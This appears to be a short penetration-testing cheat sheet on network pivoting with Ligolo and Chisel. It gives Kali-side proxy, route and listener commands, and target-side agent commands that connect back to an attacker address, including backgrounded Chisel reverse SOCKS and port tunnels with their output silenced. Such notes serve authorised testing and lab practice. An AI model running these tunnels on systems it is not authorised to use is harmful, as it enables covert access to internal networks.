#1. Ligolo
on Kali:
# Listening
sudo ./proxy -selfcert
# After Session Connected
session
1 (enter appropriate session number)
autoroute
# manual add
session
1 (enter appropriate session number)
start --tun ligolo1
sudo ip route add 10.10.10.0/24 dev ligolo1
sudo ip route add 240.0.0.1/32 dev ligolo1on Agent Host(Target Host):
# Linux
./agent -connect 10.10.10.10:11601 -ignore-cert
# Windows
.\agent.exe -connect 10.10.10.10:11601 -ignore-certListener_add:
# on Kali Ligolo Proxy Session
listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:11601- Packets coming to the Agent Host’s port 4444 will be sent to Kali
Access to agent host’s Local Port:
sudo ip route add 240.0.0.1/32 dev ligolo1
curl 240.0.0.1:8080#2. Chisel
on Kali:
./chisel server --port 443 --reverseSetup Dynamic Port Forwading on Target (need proxychains to use it):
./chisel client 10.10.10.10:443 R:socks > /dev/null 2>&1 &Setup 1:1 Port Forwarding on Target:
./chisel client 10.10.10.10:443 R:8080:127.0.0.1:8080 R:8081:127.0.0.1:8081 > /dev/null 2>&1 &- Packets coming to the Kali’s port 8080,8081 will be sent to Target’s Local 8080,8081 via Kali’s Port 443